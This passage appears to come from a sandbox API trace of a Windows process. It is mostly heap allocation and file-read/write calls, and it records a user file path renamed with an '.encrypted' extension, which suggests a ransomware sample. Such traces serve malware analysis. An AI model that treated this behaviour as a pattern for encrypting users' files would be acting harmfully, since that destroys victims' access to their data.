(in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.268] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.269] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0043.269] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3730, lpOverlapped=0x0) returned 1 [0043.270] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0043.270] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x3730, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.270] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.encrypted.flv\r\n", cchWideChar=75, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 75 [0043.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4b) returned 0x7f36e0 [0043.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.encrypted.flv\r\n", cchWideChar=75, lpMultiByteStr=0x7f36e0, cbMultiByte=75, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.encrypted.flv\r\n", lpUsedDefaultChar=0x0) returned 75 [0043.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0043.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0043.270] WriteFile (in: hFile=0x140, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x4a, lpOverlapped=0x0) returned 1 [0043.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0043.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.271] CloseHandle (hObject=0x140) returned 1 [0043.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0043.273] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0043.273] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.274] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0043.274] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.274] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0043.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0043.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.274] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af408 [0043.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0043.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0043.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0043.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889958 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0043.275] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0043.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0043.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0043.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0043.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.277] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 